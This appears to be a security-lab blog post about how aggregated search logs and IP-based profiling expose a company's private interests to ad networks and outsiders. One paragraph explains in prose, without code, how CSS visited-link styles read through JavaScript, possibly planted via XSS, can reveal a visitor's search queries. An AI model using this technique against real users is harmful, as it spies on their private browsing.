Blog

A Company Diary?

Imagine the scope and nature of all the web searches that you and your employees do on a daily or weekly basis. A log of such search queries is almost like an intimate diary, isn’t it? Not only are your professional interests laid out quite clearly, but your hobbies, health concerns, family concerns, political slant, travel plans, shopping efforts, dining considerations, and on and on, are all succinctly summarized in your search log.

Now imagine what the combined search log of everyone in your company might look like. The stats can in fact reveal a wide range of proprietary information. Here might be a sampling:

• The technology areas you’re currently focusing on
• Shifts in technology focus
• Possible new products or initiatives being planned
• Mergers or acquisitions under consideration
• Key internal products you’re considering, such as a new security system
• Increases in employee job search activity (Internal mismanagement? Undisclosed financial difficulties?)

How are Profiles Created?

Now we’ll take a look at just how these profiles or company diaries get created. First, here are a few ways an individual’s search activity can get tied to that person:

• Cookies
• Network Address
• Registered user accounts
• Browser environment variables (although these may not pinpoint someone, they could help narrow in)
• Online behavior (perhaps you pull the same RSS threads every morning or check the same portfolio of stocks?)

A company might then have a multitude of services across which it aggregates an individual’s activity (think Google Web Search, Blog Search, News Search, Groups, Froogle, Desktop, Reader, Maps, etc.).

Now, how is a company profile created? Well, if your company owns a block of IP addresses, it’s this IP range, of course. The IP range used essentially tags most companies with a publicly available Internet ID. It is commonplace now for a Web Service to aggregate activity across an IP range to gather group profiles.

The Risk

The bottom line here is that this very proprietary company diary has left the building and is no longer under your control. To deepen the matter, there’s a general sense that a company’s profile isn’t necessarily as private a matter as an individual’s profile. While most companies take great care to say that web profiles of individuals will be kept anonymous (Individually Identifiable Information generally not shared with affiliates), this is not the case with a company’s profile. It’s common to see website privacy policies that state they aggregate on the IP and then share this information with others.

So as your company’s profile is proliferated across the web through affiliates and ad networks, is there really a risk it will be exposed? Of course. The more external parties there are with access, the greater the risk of a security breach; the greater the risk of an accidental disclosure; and the greater the risk of one person underestimating the sensitivity of the data. Who could have predicted the AOL debacle ? That was just one scientist trying to do "a good thing" and share his research data. Did you know that Amazon once had a feature called "Circle of Friends" where you could view the books most purchased by a particular company? Imagine the uproar if that had been a particular person instead.

SPI Dynamics recently published a white paper showing how JavaScript could be used to steal search engine queries. The main idea is really very simple. In CSS you can define a style to be associated with visited and non-visited sites. In JavaScript you can access the style of any element and thus deduce whether a link was visited or not. The key thing here is that you have to first guess the complete, exact URL for which you’d like to check the style. When you think about how simple some of the search engine URLs are (http://www.google.com/search?q=mysearchword), this really isn’t that hard, though.

A website owner could then insert this code into his or her own site, or someone of evil intent could insert the code into another’s website via an XSS attack. It’s not hard to imagine one company gleaning a pretty hefty glimpse of its competitor’s search profile. We all visit our competitor’s websites. Who would be more apt to guess exact search URLs than a competitor? Clear your web history!

The Future

There’s clearly an increasing trend right now to create web profiles: to track, aggregate, and share information on how individuals and groups use the web. Profile information is routinely bought, sold, and shared. In fact, if you surf on Yahoo!, it’s not just Yahoo! that’s tracking you, it’s also the 37 different ad networks Yahoo! has relationships with that track you with web beacons and cookies. This overall trend for profiling will surely increase, because there’s big money associated with effective ad placement. Simultaneously, because of our growing dependency on the web, these profiles will grow in richness.

Spyware and Adware vendors are already tracking where people visit on the web and what they search for. But imagine if more nefarious, malicious code authors starting tracking search results and web surfing habits, as a means to build individual identity profiles and company-specific ones. This information could not only assist in identity theft but could also help one find detailed information about a company to sell.

Consumers have been told " You have zero privacy anyway--Get over it. " Companies can’t afford to be so laissez-faire; privacy and Information Leak Prevention are fundamental in a competitive, healthy business environment.

Researcher: Amy Steier, Websense Security Labs